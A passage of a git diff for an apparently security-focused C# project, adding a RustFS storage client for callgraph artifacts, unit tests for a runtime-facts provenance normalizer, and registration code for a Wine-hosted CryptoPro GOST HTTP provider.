+ public async Task SaveAsync(CallgraphArtifactSaveRequest request, Stream content, CancellationToken cancellationToken)
+ {
+ ArgumentNullException.ThrowIfNull(request);
+ ArgumentNullException.ThrowIfNull(content);
+
+ var hash = NormalizeHash(request.Hash);
+ if (string.IsNullOrWhiteSpace(hash))
+ {
+ throw new InvalidOperationException("Callgraph artifact hash is required for CAS storage.");
+ }
+
+ var fileName = SanitizeFileName(string.IsNullOrWhiteSpace(request.FileName) ? DefaultFileName : request.FileName);
+ var objectKey = BuildObjectKey(hash, fileName);
+
+ // Store the artifact
+ await PutObjectAsync(objectKey, content, request.ContentType, cancellationToken).ConfigureAwait(false);
+
+ // Store the manifest
+ var manifestKey = BuildObjectKey(hash, ManifestFileName);
+ if (request.ManifestContent != null)
+ {
+ request.ManifestContent.Position = 0;
+ await PutObjectAsync(manifestKey, request.ManifestContent, "application/json", cancellationToken).ConfigureAwait(false);
+ }
+ else
+ {
+ // Create empty manifest placeholder
+ using var emptyManifest = new MemoryStream(Encoding.UTF8.GetBytes("{}"));
+ await PutObjectAsync(manifestKey, emptyManifest, "application/json", cancellationToken).ConfigureAwait(false);
+ }
+
+ var artifactLength = content.CanSeek ? content.Length : 0;
+ _logger.LogInformation("Stored callgraph artifact {Hash}/{FileName} in RustFS bucket {Bucket}.",
+ hash, fileName, _storageOptions.BucketName);
+
+ return new StoredCallgraphArtifact(
+ objectKey,
+ artifactLength,
+ hash,
+ request.ContentType,
+ $"cas://reachability/graphs/{hash}",
+ manifestKey,
+ $"cas://reachability/graphs/{hash}/manifest");
+ }
+
+ public async Task GetAsync(string hash, string? fileName = null, CancellationToken cancellationToken = default)
+ {
+ var normalizedHash = NormalizeHash(hash);
+ if (string.IsNullOrWhiteSpace(normalizedHash))
+ {
+ return null;
+ }
+
+ var targetFileName = SanitizeFileName(string.IsNullOrWhiteSpace(fileName) ? DefaultFileName : fileName);
+ var objectKey = BuildObjectKey(normalizedHash, targetFileName);
+
+ var result = await GetObjectAsync(objectKey, cancellationToken).ConfigureAwait(false);
+ if (result is null)
+ {
+ _logger.LogDebug("Callgraph artifact {Hash}/{FileName} not found in RustFS.", normalizedHash, targetFileName);
+ }
+ else
+ {
+ _logger.LogDebug("Retrieved callgraph artifact {Hash}/{FileName} from RustFS.", normalizedHash, targetFileName);
+ }
+
+ return result;
+ }
+
+ public async Task GetManifestAsync(string hash, CancellationToken cancellationToken = default)
+ {
+ var normalizedHash = NormalizeHash(hash);
+ if (string.IsNullOrWhiteSpace(normalizedHash))
+ {
+ return null;
+ }
+
+ var manifestKey = BuildObjectKey(normalizedHash, ManifestFileName);
+ var result = await GetObjectAsync(manifestKey, cancellationToken).ConfigureAwait(false);
+
+ if (result is null)
+ {
+ _logger.LogDebug("Callgraph manifest for {Hash} not found in RustFS.", normalizedHash);
+ }
+ else
+ {
+ _logger.LogDebug("Retrieved callgraph manifest for {Hash} from RustFS.", normalizedHash);
+ }
+
+ return result;
+ }
+
+ public async Task ExistsAsync(string hash, CancellationToken cancellationToken = default)
+ {
+ var normalizedHash = NormalizeHash(hash);
+ if (string.IsNullOrWhiteSpace(normalizedHash))
+ {
+ return false;
+ }
+
+ var objectKey = BuildObjectKey(normalizedHash, DefaultFileName);
+ var exists = await HeadObjectAsync(objectKey, cancellationToken).ConfigureAwait(false);
+
+ _logger.LogDebug("Callgraph artifact {Hash} exists={Exists} in RustFS.", normalizedHash, exists);
+ return exists;
+ }
+
+ private string BuildObjectKey(string hash, string fileName)
+ {
+ var prefix = hash.Length >= 2 ? hash[..2] : hash;
+ var rootPrefix = string.IsNullOrWhiteSpace(_storageOptions.RootPrefix) ? "callgraphs" : _storageOptions.RootPrefix;
+ return $"{rootPrefix}/{prefix}/{hash}/{fileName}";
+ }
+
+ private async Task PutObjectAsync(string objectKey, Stream content, string? contentType, CancellationToken cancellationToken)
+ {
+ var client = _httpClientFactory.CreateClient(HttpClientName);
+ using var request = new HttpRequestMessage(HttpMethod.Put, BuildRequestUri(objectKey))
+ {
+ Content = CreateHttpContent(content)
+ };
+
+ request.Content.Headers.ContentType = string.IsNullOrWhiteSpace(contentType)
+ ? OctetStream
+ : new MediaTypeHeaderValue(contentType);
+
+ ApplyHeaders(request);
+
+ // Mark as immutable with 90-day retention per CAS contract
+ request.Headers.TryAddWithoutValidation(ImmutableHeader, "true");
+ var retainSeconds = Math.Ceiling(DefaultRetention.TotalSeconds);
+ request.Headers.TryAddWithoutValidation(RetainSecondsHeader, retainSeconds.ToString(CultureInfo.InvariantCulture));
+
+ using var response = await client.SendAsync(request, HttpCompletionOption.ResponseHeadersRead, cancellationToken).ConfigureAwait(false);
+ if (!response.IsSuccessStatusCode)
+ {
+ var error = await ReadErrorAsync(response, cancellationToken).ConfigureAwait(false);
+ throw new InvalidOperationException(
+ $"RustFS upload for {_storageOptions.BucketName}/{objectKey} failed with status {(int)response.StatusCode} ({response.ReasonPhrase}). {error}");
+ }
+
+ _logger.LogDebug("Uploaded callgraph object {Bucket}/{Key} via RustFS.", _storageOptions.BucketName, objectKey);
+ }
+
+ private async Task GetObjectAsync(string objectKey, CancellationToken cancellationToken)
+ {
+ var client = _httpClientFactory.CreateClient(HttpClientName);
+ using var request = new HttpRequestMessage(HttpMethod.Get, BuildRequestUri(objectKey));
+ ApplyHeaders(request);
+
+ using var response = await client.SendAsync(request, HttpCompletionOption.ResponseHeadersRead, cancellationToken).ConfigureAwait(false);
+ if (response.StatusCode == HttpStatusCode.NotFound)
+ {
+ return null;
+ }
+
+ if (!response.IsSuccessStatusCode)
+ {
+ var error = await ReadErrorAsync(response, cancellationToken).ConfigureAwait(false);
+ throw new InvalidOperationException(
+ $"RustFS download for {_storageOptions.BucketName}/{objectKey} failed with status {(int)response.StatusCode} ({response.ReasonPhrase}). {error}");
+ }
+
+ var buffer = new MemoryStream();
+ if (response.Content is not null)
+ {
+ await response.Content.CopyToAsync(buffer, cancellationToken).ConfigureAwait(false);
+ }
+
+ buffer.Position = 0;
+ return buffer;
+ }
+
+ private async Task HeadObjectAsync(string objectKey, CancellationToken cancellationToken)
+ {
+ var client = _httpClientFactory.CreateClient(HttpClientName);
+ using var request = new HttpRequestMessage(HttpMethod.Head, BuildRequestUri(objectKey));
+ ApplyHeaders(request);
+
+ using var response = await client.SendAsync(request, HttpCompletionOption.ResponseHeadersRead, cancellationToken).ConfigureAwait(false);
+ return response.StatusCode == HttpStatusCode.OK;
+ }
+
+ private Uri BuildRequestUri(string objectKey)
+ {
+ if (!Uri.TryCreate(_storageOptions.RustFs.BaseUrl, UriKind.Absolute, out var baseUri))
+ {
+ throw new InvalidOperationException("RustFS baseUrl is invalid.");
+ }
+
+ var encodedBucket = Uri.EscapeDataString(_storageOptions.BucketName);
+ var encodedKey = EncodeKey(objectKey);
+ var relativePath = new StringBuilder()
+ .Append("buckets/")
+ .Append(encodedBucket)
+ .Append("/objects/")
+ .Append(encodedKey)
+ .ToString();
+
+ return new Uri(baseUri, relativePath);
+ }
+
+ private static string EncodeKey(string key)
+ {
+ if (string.IsNullOrWhiteSpace(key))
+ {
+ return string.Empty;
+ }
+
+ var segments = key.Split('/', StringSplitOptions.RemoveEmptyEntries | StringSplitOptions.TrimEntries);
+ return string.Join('/', segments.Select(Uri.EscapeDataString));
+ }
+
+ private void ApplyHeaders(HttpRequestMessage request)
+ {
+ var rustFsOptions = _storageOptions.RustFs;
+ if (!string.IsNullOrWhiteSpace(rustFsOptions.ApiKeyHeader) && !string.IsNullOrWhiteSpace(rustFsOptions.ApiKey))
+ {
+ request.Headers.TryAddWithoutValidation(rustFsOptions.ApiKeyHeader, rustFsOptions.ApiKey);
+ }
+
+ foreach (var header in _storageOptions.Headers)
+ {
+ request.Headers.TryAddWithoutValidation(header.Key, header.Value);
+ }
+ }
+
+ private static HttpContent CreateHttpContent(Stream content)
+ {
+ if (content is MemoryStream memoryStream)
+ {
+ if (memoryStream.TryGetBuffer(out var segment))
+ {
+ return new ByteArrayContent(segment.Array!, segment.Offset, segment.Count);
+ }
+
+ return new ByteArrayContent(memoryStream.ToArray());
+ }
+
+ if (content.CanSeek)
+ {
+ var originalPosition = content.Position;
+ try
+ {
+ content.Position = 0;
+ using var duplicate = new MemoryStream();
+ content.CopyTo(duplicate);
+ return new ByteArrayContent(duplicate.ToArray());
+ }
+ finally
+ {
+ content.Position = originalPosition;
+ }
+ }
+
+ using var buffer = new MemoryStream();
+ content.CopyTo(buffer);
+ return new ByteArrayContent(buffer.ToArray());
+ }
+
+ private static async Task ReadErrorAsync(HttpResponseMessage response, CancellationToken cancellationToken)
+ {
+ if (response.Content is null)
+ {
+ return string.Empty;
+ }
+
+ var text = await response.Content.ReadAsStringAsync(cancellationToken).ConfigureAwait(false);
+ if (string.IsNullOrWhiteSpace(text))
+ {
+ return string.Empty;
+ }
+
+ var trimmed = text.Trim();
+ return trimmed.Length <= 512 ? trimmed : trimmed[..512];
+ }
+
+ private static string? NormalizeHash(string? hash)
+ => hash?.Trim().ToLowerInvariant();
+
+ private static string SanitizeFileName(string value)
+ => string.Join('_', value.Split(Path.GetInvalidFileNameChars(), StringSplitOptions.RemoveEmptyEntries | StringSplitOptions.TrimEntries)).ToLowerInvariant();
+}
diff --git a/src/Signals/__Tests/StellaOps.Signals.Tests/RuntimeFactsIngestionServiceTests.cs b/src/Signals/__Tests/StellaOps.Signals.Tests/RuntimeFactsIngestionServiceTests.cs
index 96677f197..f259527af 100644
--- a/src/Signals/__Tests/StellaOps.Signals.Tests/RuntimeFactsIngestionServiceTests.cs
+++ b/src/Signals/__Tests/StellaOps.Signals.Tests/RuntimeFactsIngestionServiceTests.cs
@@ -17,12 +17,14 @@ public class RuntimeFactsIngestionServiceTests
var scoringService = new RecordingScoringService();
var cache = new InMemoryReachabilityCache();
var eventsPublisher = new RecordingEventsPublisher();
+ var provenanceNormalizer = new RuntimeFactsProvenanceNormalizer();
var service = new RuntimeFactsIngestionService(
factRepository,
TimeProvider.System,
cache,
eventsPublisher,
scoringService,
+ provenanceNormalizer,
NullLogger.Instance);
var request = new RuntimeFactsIngestRequest
@@ -61,6 +63,21 @@ public class RuntimeFactsIngestionServiceTests
Assert.Equal("runtime", persisted.Metadata?["provenance.source"]);
Assert.Equal("cg-123", persisted.Metadata?["provenance.callgraphId"]);
Assert.NotNull(persisted.Metadata?["provenance.ingestedAt"]);
+
+ // Verify context_facts with AOC provenance (SIGNALS-24-003)
+ Assert.NotNull(persisted.ContextFacts);
+ Assert.NotNull(persisted.ContextFacts.Provenance);
+ Assert.Equal(1, persisted.ContextFacts.Provenance.SchemaVersion);
+ Assert.Equal(ProvenanceFeedType.RuntimeFacts, persisted.ContextFacts.Provenance.FeedType);
+ Assert.Equal(3, persisted.ContextFacts.RecordCount); // Three events (provenance tracks each observation)
+ Assert.NotEmpty(persisted.ContextFacts.Provenance.Records);
+ Assert.All(persisted.ContextFacts.Provenance.Records, record =>
+ {
+ Assert.NotEmpty(record.RecordId);
+ Assert.NotEmpty(record.RecordType);
+ Assert.NotNull(record.Subject);
+ Assert.NotNull(record.Facts);
+ });
}
private sealed class InMemoryReachabilityFactRepository : IReachabilityFactRepository
diff --git a/src/Signals/__Tests/StellaOps.Signals.Tests/RuntimeFactsProvenanceNormalizerTests.cs b/src/Signals/__Tests/StellaOps.Signals.Tests/RuntimeFactsProvenanceNormalizerTests.cs
new file mode 100644
index 000000000..3c7106071
--- /dev/null
+++ b/src/Signals/__Tests/StellaOps.Signals.Tests/RuntimeFactsProvenanceNormalizerTests.cs
@@ -0,0 +1,400 @@
+using System;
+using System.Collections.Generic;
+using System.Linq;
+using StellaOps.Signals.Models;
+using StellaOps.Signals.Services;
+using Xunit;
+
+namespace StellaOps.Signals.Tests;
+
+public class RuntimeFactsProvenanceNormalizerTests
+{
+ private readonly RuntimeFactsProvenanceNormalizer _normalizer = new();
+
+ [Fact]
+ public void NormalizeToFeed_CreatesValidProvenanceFeed()
+ {
+ var events = new List
+ {
+ new() { SymbolId = "svc.foo", HitCount = 5 },
+ new() { SymbolId = "svc.bar", HitCount = 3 }
+ };
+ var subject = new ReachabilitySubject { Component = "web", Version = "1.0.0" };
+ var timestamp = DateTimeOffset.Parse("2025-12-07T10:00:00Z");
+
+ var feed = _normalizer.NormalizeToFeed(events, subject, "cg-123", null, timestamp);
+
+ Assert.Equal(1, feed.SchemaVersion);
+ Assert.Equal(ProvenanceFeedType.RuntimeFacts, feed.FeedType);
+ Assert.NotEmpty(feed.FeedId);
+ Assert.Equal(timestamp, feed.GeneratedAt);
+ Assert.Equal("signals-runtime-ingestion", feed.SourceService);
+ Assert.Equal("cg-123", feed.CorrelationId);
+ Assert.Equal(2, feed.Records.Count);
+ }
+
+ [Fact]
+ public void NormalizeToFeed_PopulatesAocMetadata()
+ {
+ var events = new List
+ {
+ new() { SymbolId = "svc.foo", HitCount = 1 }
+ };
+ var subject = new ReachabilitySubject { Component = "web", Version = "1.0.0" };
+ var requestMetadata = new Dictionary { ["source"] = "ebpf-agent" };
+
+ var feed = _normalizer.NormalizeToFeed(events, subject, "cg-456", requestMetadata, DateTimeOffset.UtcNow);
+
+ Assert.NotNull(feed.Metadata);
+ Assert.Equal("1", feed.Metadata["aoc.version"]);
+ Assert.Equal("SGSI0101", feed.Metadata["aoc.contract"]);
+ Assert.Equal("cg-456", feed.Metadata["callgraphId"]);
+ Assert.Equal("web|1.0.0", feed.Metadata["subjectKey"]);
+ Assert.Equal("ebpf-agent", feed.Metadata["request.source"]);
+ }
+
+ [Fact]
+ public void NormalizeToFeed_SetsRecordTypeBasedOnProcessMetadata()
+ {
+ var evt = new RuntimeFactEvent
+ {
+ SymbolId = "svc.foo",
+ ProcessName = "python3",
+ ProcessId = 12345,
+ HitCount = 1
+ };
+ var subject = new ReachabilitySubject { Component = "api", Version = "2.0.0" };
+
+ var feed = _normalizer.NormalizeToFeed(new[] { evt }, subject, "cg-test", null, DateTimeOffset.UtcNow);
+
+ Assert.Single(feed.Records);
+ Assert.Equal("runtime.process.observed", feed.Records[0].RecordType);
+ Assert.Equal(ProvenanceSubjectType.Process, feed.Records[0].Subject.Type);
+ }
+
+ [Fact]
+ public void NormalizeToFeed_SetsRecordTypeForNetworkConnection()
+ {
+ var evt = new RuntimeFactEvent
+ {
+ SymbolId = "net.connect",
+ SocketAddress = "10.0.0.1:8080",
+ HitCount = 1
+ };
+ var subject = new ReachabilitySubject { Component = "gateway", Version = "1.0.0" };
+
+ var feed = _normalizer.NormalizeToFeed(new[] { evt }, subject, "cg-net", null, DateTimeOffset.UtcNow);
+
+ Assert.Single(feed.Records);
+ Assert.Equal("runtime.network.connection", feed.Records[0].RecordType);
+ }
+
+ [Fact]
+ public void NormalizeToFeed_SetsRecordTypeForContainerActivity()
+ {
+ var evt = new RuntimeFactEvent
+ {
+ SymbolId = "container.exec",
+ ContainerId = "abc123def456",
+ HitCount = 1
+ };
+ var subject = new ReachabilitySubject { ImageDigest = "sha256:deadbeef" };
+
+ var feed = _normalizer.NormalizeToFeed(new[] { evt }, subject, "cg-container", null, DateTimeOffset.UtcNow);
+
+ Assert.Single(feed.Records);
+ Assert.Equal("runtime.container.activity", feed.Records[0].RecordType);
+ Assert.Equal(ProvenanceSubjectType.Container, feed.Records[0].Subject.Type);
+ }
+
+ [Fact]
+ public void NormalizeToFeed_SetsRecordTypeForPackageLoaded()
+ {
+ var evt = new RuntimeFactEvent
+ {
+ SymbolId = "pkg.load",
+ Purl = "pkg:npm/lodash@4.17.21",
+ HitCount = 1
+ };
+ var subject = new ReachabilitySubject { Component = "webapp", Version = "1.0.0" };
+
+ var feed = _normalizer.NormalizeToFeed(new[] { evt }, subject, "cg-pkg", null, DateTimeOffset.UtcNow);
+
+ Assert.Single(feed.Records);
+ Assert.Equal("runtime.package.loaded", feed.Records[0].RecordType);
+ Assert.Equal(ProvenanceSubjectType.Package, feed.Records[0].Subject.Type);
+ Assert.Equal("pkg:npm/lodash@4.17.21", feed.Records[0].Subject.Identifier);
+ }
+
+ [Fact]
+ public void NormalizeToFeed_PopulatesRuntimeProvenanceFacts()
+ {
+ var evt = new RuntimeFactEvent
+ {
+ SymbolId = "svc.handler",
+ ProcessName = "java",
+ ProcessId = 9999,
+ SocketAddress = "localhost:3306",
+ ContainerId = "k8s_pod_abc",
+ HitCount = 42,
+ Purl = "pkg:maven/com.example/lib@1.0.0",
+ CodeId = "code-123",
+ BuildId = "build-456",
+ LoaderBase = "/usr/lib/jvm",
+ Metadata = new Dictionary { ["env"] = "prod" }
+ };
+ var subject = new ReachabilitySubject { Component = "svc", Version = "3.0.0" };
+
+ var feed = _normalizer.NormalizeToFeed(new[] { evt }, subject, "cg-full", null, DateTimeOffset.UtcNow);
+
+ Assert.Single(feed.Records);
+ var facts = feed.Records[0].Facts;
+ Assert.NotNull(facts);
+ Assert.Equal("svc.handler", facts.SymbolId);
+ Assert.Equal("java", facts.ProcessName);
+ Assert.Equal(9999, facts.ProcessId);
+ Assert.Equal("localhost:3306", facts.SocketAddress);
+ Assert.Equal("k8s_pod_abc", facts.ContainerId);
+ Assert.Equal(42, facts.HitCount);
+ Assert.Equal("pkg:maven/com.example/lib@1.0.0", facts.Purl);
+ Assert.Equal("code-123", facts.CodeId);
+ Assert.Equal("build-456", facts.BuildId);
+ Assert.Equal("/usr/lib/jvm", facts.LoaderBase);
+ Assert.NotNull(facts.Metadata);
+ Assert.Equal("prod", facts.Metadata["env"]);
+ }
+
+ [Fact]
+ public void NormalizeToFeed_SetsConfidenceBasedOnEvidence()
+ {
+ var evtWithFullEvidence = new RuntimeFactEvent
+ {
+ SymbolId = "svc.full",
+ ProcessName = "node",
+ ProcessId = 1234,
+ SymbolDigest = "sha256:abcdef1234567890abcdef1234567890abcdef1234567890abcdef1234567890",
+ EvidenceUri = "s3://bucket/evidence.json",
+ HitCount = 1
+ };
+ var evtMinimal = new RuntimeFactEvent
+ {
+ SymbolId = "svc.minimal",
+ HitCount = 1
+ };
+ var subject = new ReachabilitySubject { Component = "app", Version = "1.0.0" };
+
+ var feed = _normalizer.NormalizeToFeed(new[] { evtWithFullEvidence, evtMinimal }, subject, "cg-conf", null, DateTimeOffset.UtcNow);
+
+ Assert.Equal(2, feed.Records.Count);
+ var fullRecord = feed.Records.First(r => r.Facts?.SymbolId == "svc.full");
+ var minimalRecord = feed.Records.First(r => r.Facts?.SymbolId == "svc.minimal");
+
+ Assert.True(fullRecord.Confidence > minimalRecord.Confidence);
+ Assert.True(fullRecord.Confidence >= 0.95);
+ Assert.True(minimalRecord.Confidence >= 0.95);
+ }
+
+ [Fact]
+ public void NormalizeToFeed_BuildsEvidenceWithCaptureMethod()
+ {
+ var evt = new RuntimeFactEvent
+ {
+ SymbolId = "svc.traced",
+ SymbolDigest = "abc123",
+ EvidenceUri = "s3://evidence/trace.json",
+ ProcessId = 5678,
+ HitCount = 1,
+ Metadata = new Dictionary { ["captureMethod"] = "eBPF" }
+ };
+ var subject = new ReachabilitySubject { Component = "traced", Version = "1.0.0" };
+
+ var feed = _normalizer.NormalizeToFeed(new[] { evt }, subject, "cg-evidence", null, DateTimeOffset.UtcNow);
+
+ Assert.Single(feed.Records);
+ var evidence = feed.Records[0].Evidence;
+ Assert.NotNull(evidence);
+ Assert.Equal(EvidenceCaptureMethod.EBpf, evidence.CaptureMethod);
+ Assert.Equal("s3://evidence/trace.json", evidence.RawDataRef);
+ }
+
+ [Fact]
+ public void NormalizeToFeed_NormalizesDigestWithSha256Prefix()
+ {
+ var evt = new RuntimeFactEvent
+ {
+ SymbolId = "svc.digested",
+ SymbolDigest = "abcdef1234567890abcdef1234567890abcdef1234567890abcdef1234567890",
+ HitCount = 1
+ };
+ var subject = new ReachabilitySubject { Component = "app", Version = "1.0.0" };
+
+ var feed = _normalizer.NormalizeToFeed(new[] { evt }, subject, "cg-digest", null, DateTimeOffset.UtcNow);
+
+ Assert.Single(feed.Records);
+ var evidence = feed.Records[0].Evidence;
+ Assert.NotNull(evidence);
+ Assert.StartsWith("sha256:", evidence.SourceDigest);
+ }
+
+ [Fact]
+ public void NormalizeToFeed_SkipsEventsWithEmptySymbolId()
+ {
+ var events = new List
+ {
+ new() { SymbolId = "valid.symbol", HitCount = 1 },
+ new() { SymbolId = "", HitCount = 1 },
+ new() { SymbolId = " ", HitCount = 1 },
+ new() { SymbolId = null!, HitCount = 1 }
+ };
+ var subject = new ReachabilitySubject { Component = "app", Version = "1.0.0" };
+
+ var feed = _normalizer.NormalizeToFeed(events, subject, "cg-filter", null, DateTimeOffset.UtcNow);
+
+ Assert.Single(feed.Records);
+ Assert.Equal("valid.symbol", feed.Records[0].Facts?.SymbolId);
+ }
+
+ [Fact]
+ public void CreateContextFacts_ReturnsPopulatedContextFacts()
+ {
+ var events = new List
+ {
+ new() { SymbolId = "svc.a", HitCount = 1 },
+ new() { SymbolId = "svc.b", HitCount = 2 },
+ new() { SymbolId = "svc.c", HitCount = 3 }
+ };
+ var subject = new ReachabilitySubject { Component = "svc", Version = "1.0.0" };
+ var timestamp = DateTimeOffset.Parse("2025-12-07T12:00:00Z");
+
+ var contextFacts = _normalizer.CreateContextFacts(events, subject, "cg-ctx", null, timestamp);
+
+ Assert.NotNull(contextFacts);
+ Assert.NotNull(contextFacts.Provenance);
+ Assert.Equal(timestamp, contextFacts.LastUpdatedAt);
+ Assert.Equal(3, contextFacts.RecordCount);
+ Assert.Equal(3, contextFacts.Provenance.Records.Count);
+ }
+
+ [Fact]
+ public void NormalizeToFeed_DeterminesObserverFromContainerContext()
+ {
+ var evt = new RuntimeFactEvent
+ {
+ SymbolId = "container.runtime",
+ ContainerId = "docker_abc123",
+ HitCount = 1
+ };
+ var subject = new ReachabilitySubject { ImageDigest = "sha256:test" };
+
+ var feed = _normalizer.NormalizeToFeed(new[] { evt }, subject, "cg-observer", null, DateTimeOffset.UtcNow);
+
+ Assert.Single(feed.Records);
+ Assert.Equal("container-runtime-agent", feed.Records[0].ObservedBy);
+ }
+
+ [Fact]
+ public void NormalizeToFeed_DeterminesObserverFromProcessContext()
+ {
+ var evt = new RuntimeFactEvent
+ {
+ SymbolId = "process.runtime",
+ ProcessId = 12345,
+ HitCount = 1
+ };
+ var subject = new ReachabilitySubject { Component = "app", Version = "1.0.0" };
+
+ var feed = _normalizer.NormalizeToFeed(new[] { evt }, subject, "cg-proc", null, DateTimeOffset.UtcNow);
+
+ Assert.Single(feed.Records);
+ Assert.Equal("process-monitor-agent", feed.Records[0].ObservedBy);
+ }
+
+ [Fact]
+ public void NormalizeToFeed_UsesObservedAtFromEvent()
+ {
+ var observedTime = DateTimeOffset.Parse("2025-12-06T08:00:00Z");
+ var generatedTime = DateTimeOffset.Parse("2025-12-07T10:00:00Z");
+ var evt = new RuntimeFactEvent
+ {
+ SymbolId = "svc.timed",
+ ObservedAt = observedTime,
+ HitCount = 1
+ };
+ var subject = new ReachabilitySubject { Component = "timed", Version = "1.0.0" };
+
+ var feed = _normalizer.NormalizeToFeed(new[] { evt }, subject, "cg-time", null, generatedTime);
+
+ Assert.Single(feed.Records);
+ Assert.Equal(observedTime, feed.Records[0].OccurredAt);
+ }
+
+ [Fact]
+ public void NormalizeToFeed_FallsBackToGeneratedAtWhenNoObservedAt()
+ {
+ var generatedTime = DateTimeOffset.Parse("2025-12-07T10:00:00Z");
+ var evt = new RuntimeFactEvent
+ {
+ SymbolId = "svc.notime",
+ HitCount = 1
+ };
+ var subject = new ReachabilitySubject { Component = "notime", Version = "1.0.0" };
+
+ var feed = _normalizer.NormalizeToFeed(new[] { evt }, subject, "cg-notime", null, generatedTime);
+
+ Assert.Single(feed.Records);
+ Assert.Equal(generatedTime, feed.Records[0].OccurredAt);
+ }
+
+ [Fact]
+ public void NormalizeToFeed_BuildsSubjectIdentifierFromPurl()
+ {
+ var evt = new RuntimeFactEvent
+ {
+ SymbolId = "lib.call",
+ Purl = "pkg:npm/express@4.18.0",
+ HitCount = 1
+ };
+ var subject = new ReachabilitySubject { Component = "webapp", Version = "1.0.0" };
+
+ var feed = _normalizer.NormalizeToFeed(new[] { evt }, subject, "cg-purl", null, DateTimeOffset.UtcNow);
+
+ Assert.Single(feed.Records);
+ Assert.Equal("pkg:npm/express@4.18.0", feed.Records[0].Subject.Identifier);
+ }
+
+ [Fact]
+ public void NormalizeToFeed_BuildsSubjectIdentifierFromComponent()
+ {
+ var evt = new RuntimeFactEvent
+ {
+ SymbolId = "svc.call",
+ HitCount = 1
+ };
+ var subject = new ReachabilitySubject { Component = "my-service", Version = "2.0.0" };
+
+ var feed = _normalizer.NormalizeToFeed(new[] { evt }, subject, "cg-comp", null, DateTimeOffset.UtcNow);
+
+ Assert.Single(feed.Records);
+ Assert.Equal("my-service@2.0.0", feed.Records[0].Subject.Identifier);
+ }
+
+ [Fact]
+ public void NormalizeToFeed_UsesImageDigestAsSubjectForContainers()
+ {
+ var evt = new RuntimeFactEvent
+ {
+ SymbolId = "container.exec",
+ HitCount = 1
+ };
+ var subject = new ReachabilitySubject
+ {
+ ImageDigest = "sha256:abc123def456"
+ };
+
+ var feed = _normalizer.NormalizeToFeed(new[] { evt }, subject, "cg-image", null, DateTimeOffset.UtcNow);
+
+ Assert.Single(feed.Records);
+ Assert.Equal(ProvenanceSubjectType.Image, feed.Records[0].Subject.Type);
+ Assert.Equal("sha256:abc123def456", feed.Records[0].Subject.Identifier);
+ }
+}
diff --git a/src/__Libraries/StellaOps.Cryptography.Plugin.WineCsp/StellaOps.Cryptography.Plugin.WineCsp.csproj b/src/__Libraries/StellaOps.Cryptography.Plugin.WineCsp/StellaOps.Cryptography.Plugin.WineCsp.csproj
new file mode 100644
index 000000000..0a0dd4796
--- /dev/null
+++ b/src/__Libraries/StellaOps.Cryptography.Plugin.WineCsp/StellaOps.Cryptography.Plugin.WineCsp.csproj
@@ -0,0 +1,26 @@
+
+
+
+ net10.0
+ enable
+ enable
+
+
+ StellaOps.Cryptography.Plugin.WineCsp
+ StellaOps.Cryptography.Plugin.WineCsp
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
diff --git a/src/__Libraries/StellaOps.Cryptography.Plugin.WineCsp/WineCspCryptoServiceCollectionExtensions.cs b/src/__Libraries/StellaOps.Cryptography.Plugin.WineCsp/WineCspCryptoServiceCollectionExtensions.cs
new file mode 100644
index 000000000..9ff207b6c
--- /dev/null
+++ b/src/__Libraries/StellaOps.Cryptography.Plugin.WineCsp/WineCspCryptoServiceCollectionExtensions.cs
@@ -0,0 +1,90 @@
+using Microsoft.Extensions.DependencyInjection;
+using Microsoft.Extensions.DependencyInjection.Extensions;
+using Microsoft.Extensions.Options;
+using Polly;
+using Polly.Extensions.Http;
+
+namespace StellaOps.Cryptography.Plugin.WineCsp;
+
+///
+/// Extension methods for registering the Wine CSP HTTP provider.
+///
+public static class WineCspCryptoServiceCollectionExtensions
+{
+ ///
+ /// Registers the Wine CSP HTTP provider for GOST operations via Wine-hosted CryptoPro CSP.
+ ///
+ /// Service collection.
+ /// Optional options configuration.
+ /// Service collection for chaining.
+ public static IServiceCollection AddWineCspProvider(
+ this IServiceCollection services,
+ Action? configureOptions = null)
+ {
+ // Configure options
+ if (configureOptions != null)
+ {
+ services.Configure(configureOptions);
+ }
+
+ // Register HTTP client with retry policy
+ services.AddHttpClient((sp, client) =>
+ {
+ var options = sp.GetService>()?.Value
+ ?? new WineCspProviderOptions();
+
+ client.BaseAddress = new Uri(options.ServiceUrl);
+ client.Timeout = TimeSpan.FromSeconds(options.TimeoutSeconds);
+ client.DefaultRequestHeaders.Add("Accept", "application/json");
+ })
+ .ConfigurePrimaryHttpMessageHandler(() => new SocketsHttpHandler
+ {
+ PooledConnectionLifetime = TimeSpan.FromMinutes(5),
+ MaxConnectionsPerServer = 10
+ })
+ .AddPolicyHandler((sp, _) =>
+ {
+ var options = sp.GetService>()?.Value
+ ?? new WineCspProviderOptions();
+
+ return HttpPolicyExtensions
+ .HandleTransientHttpError()
+ .WaitAndRetryAsync(
+ options.MaxRetries,
+ retryAttempt => TimeSpan.FromSeconds(Math.Pow(2, retryAttempt - 1)));
+ });
+
+ // Register provider
+ services.TryAddSingleton();
+ services.AddSingleton(sp => sp.GetRequiredService());
+
+ return services;
+ }
+
+ ///
+ /// Registers the Wine CSP HTTP provider with custom HTTP client configuration.
+ ///
+ /// Service collection.
+ /// Options configuration.
+ /// HTTP client configuration.
+ /// Service collection for chaining.
+ public static IServiceCollection AddWineCspProvider(
+ this IServiceCollection services,
+ Action configureOptions,
+ Action configureClient)
+ {
+ services.Configure(configureOptions);
+
+ services.AddHttpClient(configureClient)
+ .ConfigurePrimaryHttpMessageHandler(() => new SocketsHttpHandler
+ {
+ PooledConnectionLifetime = TimeSpan.FromMinutes(5),
+ MaxConnectionsPerServer = 10
+ });
+
+ services.TryAddSingleton();
+ services.AddSingleton(sp => sp.GetRequiredService());
+
+ return services;
+ }
+}
diff --git a/src/__Libraries/StellaOps.Cryptography.Plugin.WineCsp/WineCspHttpClient.cs b/src/__Libraries/StellaOps.Cryptography.Plugin.WineCsp/WineCspHttpClient.cs
new file mode 100644
index 000000000..15a46920b
--- /dev/null
+++ b/src/__Libraries/StellaOps.Cryptography.Plugin.WineCsp/WineCspHttpClient.cs
@@ -0,0 +1,236 @@
+using System.Net.Http.Json;
+using System.Text.Json;
+using System.Text.Json.Serialization;
+using Microsoft.Extensions.Logging;
+using Microsoft.Extensions.Options;
+
+namespace StellaOps.Cryptography.Plugin.WineCsp;
+
+///
+/// HTTP client for communicating with the Wine CSP service.
+///
+public sealed class WineCspHttpClient : IDisposable
+{
+ private readonly HttpClient httpClient;
+ private readonly ILogger? logger;
+ private readonly JsonSerializerOptions jsonOptions;
+
+ public WineCspHttpClient(
+ HttpClient httpClient,
